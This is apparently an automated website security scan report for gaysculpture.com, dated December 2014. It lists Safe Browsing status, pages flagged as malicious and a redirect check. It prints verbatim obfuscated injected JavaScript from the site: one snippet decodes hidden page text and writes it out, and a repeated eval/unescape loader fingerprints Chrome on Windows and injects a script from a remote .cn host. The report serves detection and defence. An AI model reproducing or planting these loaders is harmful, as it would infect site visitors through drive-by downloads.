Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gaysculpture.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://gaysculpture.com/ | 200 OK Content-Length: 11797 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var AB37075C18771DA576FF = 12-9;var A4F04FD5E0D617484FAC = document.getElementById('c42A259EB7F048BFFD754D4').innerHTML;var c42d5eb5edE795BA0866D303AA8E5D = new String;A4F04FD5E0D617484FAC = A4F04FD5E0D617484FAC.substr(4,550);for(i=0;i<A4F04FD5E0D617484FAC.length;i++) c42d5eb5edE795BA0866D303AA8E5D += String.fromCharCode(A4F04FD5E0D617484FAC.substr(i,1).charCodeAt()-AB37075C18771DA576FF);document.write(c42d5eb5edE795BA0866D303AA8E5D); Antivirus reports:
| ||
http://gaysculpture.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 8029 Content-Type: application/javascript | clean |
http://gaysculpture.com/gay_sculpture_01.html | 200 OK Content-Length: 9066 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- (function(gEU){var LaQ='%';eval(unescape(('va,72,20a,3d,22S,63ri,70,74Eng,69ne,22,2cb,3d,22Version()+,22,2cj,3d,22,22,2cu,3dnav,69ga,74,6f,72,2eu,73erA,67ent,3bif,28(,75,2ei,6edexOf,28,22Chrom,65,22),3c0),26,26(u,2ei,6ede,78,4ff,28,22Win,22),3e0),26,26(,75,2ein,64exOf(,22,4eT,206,22),3c,30,29,26,26(docum,65,6et,2eco,6fkie,2e,69nd,65xOf,28,22miek,3d,31,22),3c0),26,26(typ,65,6ff(zr,76zts),21,3dt,79,70eof(,22A,22))),7bzrvzts,3d,22A,22,3be,76al(,22,69,66(w,69ndow,2e,22,2ba+,22)j,3dj+,22+a+,22Major,22+b+a+,22Min,6fr,22,2bb+,61,2b,22B,75,69ld,22+,62+,22j,3b,22),3bdo,63um,65n,74,2ewrite(,22,3cs,63ript,20,73rc,3d,2f,2f,6dar,22+,22tuz,2ecn,2f,76,69d,2f,3fi,64,3d,22+j+,22,3e,3c,5c,2fscri,70,74,3e,22),3b,7d').replace(gEU,LaQ)))})(/\,/g); --> Antivirus reports:
| ||
http://gaysculpture.com/test404page.js | 404 Not Found Content-Length: 1270 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- (function(gEU){var LaQ='%';eval(unescape(('va,72,20a,3d,22S,63ri,70,74Eng,69ne,22,2cb,3d,22Version()+,22,2cj,3d,22,22,2cu,3dnav,69ga,74,6f,72,2eu,73erA,67ent,3bif,28(,75,2ei,6edexOf,28,22Chrom,65,22),3c0),26,26(u,2ei,6ede,78,4ff,28,22Win,22),3e0),26,26(,75,2ein,64exOf(,22,4eT,206,22),3c,30,29,26,26(docum,65,6et,2eco,6fkie,2e,69nd,65xOf,28,22miek,3d,31,22),3c0),26,26(typ,65,6ff(zr,76zts),21,3dt,79,70eof(,22A,22))),7bzrvzts,3d,22A,22,3be,76al(,22,69,66(w,69ndow,2e,22,2ba+,22)j,3dj+,22+a+,22Major,22+b+a+,22Min,6fr,22,2bb+,61,2b,22B,75,69ld,22+,62+,22j,3b,22),3bdo,63um,65n,74,2ewrite(,22,3cs,63ript,20,73rc,3d,2f,2f,6dar,22+,22tuz,2ecn,2f,76,69d,2f,3fi,64,3d,22+j+,22,3e,3c,5c,2fscri,70,74,3e,22),3b,7d').replace(gEU,LaQ)))})(/\,/g); --> Antivirus reports:
| ||
http://gaysculpture.com/homo_erotic_01.html | 404 Not Found Content-Length: 1275 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- (function(gEU){var LaQ='%';eval(unescape(('va,72,20a,3d,22S,63ri,70,74Eng,69ne,22,2cb,3d,22Version()+,22,2cj,3d,22,22,2cu,3dnav,69ga,74,6f,72,2eu,73erA,67ent,3bif,28(,75,2ei,6edexOf,28,22Chrom,65,22),3c0),26,26(u,2ei,6ede,78,4ff,28,22Win,22),3e0),26,26(,75,2ein,64exOf(,22,4eT,206,22),3c,30,29,26,26(docum,65,6et,2eco,6fkie,2e,69nd,65xOf,28,22miek,3d,31,22),3c0),26,26(typ,65,6ff(zr,76zts),21,3dt,79,70eof(,22A,22))),7bzrvzts,3d,22A,22,3be,76al(,22,69,66(w,69ndow,2e,22,2ba+,22)j,3dj+,22+a+,22Major,22+b+a+,22Min,6fr,22,2bb+,61,2b,22B,75,69ld,22+,62+,22j,3b,22),3bdo,63um,65n,74,2ewrite(,22,3cs,63ript,20,73rc,3d,2f,2f,6dar,22+,22tuz,2ecn,2f,76,69d,2f,3fi,64,3d,22+j+,22,3e,3c,5c,2fscri,70,74,3e,22),3b,7d').replace(gEU,LaQ)))})(/\,/g); --> Antivirus reports:
| ||
http://gaysculpture.com/gay_sculpture_02.html | 200 OK Content-Length: 8583 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- (function(gEU){var LaQ='%';eval(unescape(('va,72,20a,3d,22S,63ri,70,74Eng,69ne,22,2cb,3d,22Version()+,22,2cj,3d,22,22,2cu,3dnav,69ga,74,6f,72,2eu,73erA,67ent,3bif,28(,75,2ei,6edexOf,28,22Chrom,65,22),3c0),26,26(u,2ei,6ede,78,4ff,28,22Win,22),3e0),26,26(,75,2ein,64exOf(,22,4eT,206,22),3c,30,29,26,26(docum,65,6et,2eco,6fkie,2e,69nd,65xOf,28,22miek,3d,31,22),3c0),26,26(typ,65,6ff(zr,76zts),21,3dt,79,70eof(,22A,22))),7bzrvzts,3d,22A,22,3be,76al(,22,69,66(w,69ndow,2e,22,2ba+,22)j,3dj+,22+a+,22Major,22+b+a+,22Min,6fr,22,2bb+,61,2b,22B,75,69ld,22+,62+,22j,3b,22),3bdo,63um,65n,74,2ewrite(,22,3cs,63ript,20,73rc,3d,2f,2f,6dar,22+,22tuz,2ecn,2f,76,69d,2f,3fi,64,3d,22+j+,22,3e,3c,5c,2fscri,70,74,3e,22),3b,7d').replace(gEU,LaQ)))})(/\,/g); --> Antivirus reports:
| ||
http://gaysculpture.com/gay_sculpture_04.html | 200 OK Content-Length: 5008 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- (function(gEU){var LaQ='%';eval(unescape(('va,72,20a,3d,22S,63ri,70,74Eng,69ne,22,2cb,3d,22Version()+,22,2cj,3d,22,22,2cu,3dnav,69ga,74,6f,72,2eu,73erA,67ent,3bif,28(,75,2ei,6edexOf,28,22Chrom,65,22),3c0),26,26(u,2ei,6ede,78,4ff,28,22Win,22),3e0),26,26(,75,2ein,64exOf(,22,4eT,206,22),3c,30,29,26,26(docum,65,6et,2eco,6fkie,2e,69nd,65xOf,28,22miek,3d,31,22),3c0),26,26(typ,65,6ff(zr,76zts),21,3dt,79,70eof(,22A,22))),7bzrvzts,3d,22A,22,3be,76al(,22,69,66(w,69ndow,2e,22,2ba+,22)j,3dj+,22+a+,22Major,22+b+a+,22Min,6fr,22,2bb+,61,2b,22B,75,69ld,22+,62+,22j,3b,22),3bdo,63um,65n,74,2ewrite(,22,3cs,63ript,20,73rc,3d,2f,2f,6dar,22+,22tuz,2ecn,2f,76,69d,2f,3fi,64,3d,22+j+,22,3e,3c,5c,2fscri,70,74,3e,22),3b,7d').replace(gEU,LaQ)))})(/\,/g); --> Antivirus reports:
| ||
http://gaysculpture.com/homo_erotic_03.html | 404 Not Found Content-Length: 1275 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- (function(gEU){var LaQ='%';eval(unescape(('va,72,20a,3d,22S,63ri,70,74Eng,69ne,22,2cb,3d,22Version()+,22,2cj,3d,22,22,2cu,3dnav,69ga,74,6f,72,2eu,73erA,67ent,3bif,28(,75,2ei,6edexOf,28,22Chrom,65,22),3c0),26,26(u,2ei,6ede,78,4ff,28,22Win,22),3e0),26,26(,75,2ein,64exOf(,22,4eT,206,22),3c,30,29,26,26(docum,65,6et,2eco,6fkie,2e,69nd,65xOf,28,22miek,3d,31,22),3c0),26,26(typ,65,6ff(zr,76zts),21,3dt,79,70eof(,22A,22))),7bzrvzts,3d,22A,22,3be,76al(,22,69,66(w,69ndow,2e,22,2ba+,22)j,3dj+,22+a+,22Major,22+b+a+,22Min,6fr,22,2bb+,61,2b,22B,75,69ld,22+,62+,22j,3b,22),3bdo,63um,65n,74,2ewrite(,22,3cs,63ript,20,73rc,3d,2f,2f,6dar,22+,22tuz,2ecn,2f,76,69d,2f,3fi,64,3d,22+j+,22,3e,3c,5c,2fscri,70,74,3e,22),3b,7d').replace(gEU,LaQ)))})(/\,/g); --> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gaysculpture.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 12:42:15 GMT
Accept-Ranges: bytes
ETag: "2e15-4a01a5b3a8bc0"
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 11797
Content-Type: text/html
Last-Modified: Mon, 04 Apr 2011 16:36:07 GMT
...11797 bytes of data.
GET / HTTP/1.1
Host: gaysculpture.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 12:42:15 GMT
Accept-Ranges: bytes
ETag: "2e15-4a01a5b3a8bc0"
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 11797
Content-Type: text/html
Last-Modified: Mon, 04 Apr 2011 16:36:07 GMT
...11797 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: gaysculpture.com
Referer: http://www.google.com/search?q=gaysculpture.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gaysculpture.com
Referer: http://www.google.com/search?q=gaysculpture.com
Result:
The result is similar to the first query. There are no suspicious redirects found.